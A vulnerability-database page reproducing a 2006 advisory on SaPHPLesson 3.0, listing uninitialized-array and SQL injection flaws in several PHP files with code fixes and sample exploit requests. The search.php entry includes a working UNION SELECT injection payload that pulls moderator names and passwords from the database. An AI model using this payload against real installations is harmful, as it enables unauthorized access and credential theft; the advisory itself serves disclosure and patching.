Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

SaPHPLession30.txt

🗓️ 06 May 2006 00:00:00Reported by D3vil-0x1Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

SaPHPLesson 3.0 multiple security vulnerabilities addressed in show.php, showcat.php, search.php, misc.php, and index.php

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:  
  
1- Unfilter array  
  
Filename :- show.php  
Line :- 102  
  
[code]  
$hrow[] = $Row2;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /show.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
/lessons/show.php?lessid=1&hrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
2- Unfilter array  
  
Filename :- showcat.php  
Line :- 80  
  
[code]  
$Lsnrow[] = $Row;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /showcat.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$Lsnrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
3- SQL Injection  
  
Filename :- search.php  
Line :- MultLines  
  
Fix :-  
  
Line 28 Replace It With  
  
[code]  
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]  
  
Line 32 Replace It With  
  
[code]  
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]  
  
Exploit :-  
  
POST ^  
  
Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC  
  
/---------------------------------------------------------/  
  
4- SQL Injection  
  
Filename :- misc.php  
Line :- 64  
  
Fix :-  
Replace Line 62 & 63 With This Code  
  
[code]  
$LID = intval($_GET["LID"]);  
$Rate = intval($_POST["Rate"]);[/code]  
  
/---------------------------------------------------------/  
  
5- Unfilter array  
  
Filename :- index.php  
Line :- 24  
  
[code]  
$rows[] = $Row;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /index.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$rows = array();  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/saphplesson/index.php?rows=D3vil-x01  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
saphplesson 3.0multiple vulnerabilitiesshow.phpshowcat.phpsearch.phpmisc.phpindex.phpunfilter arraysql injectionsecurityexploit
27
.json
Report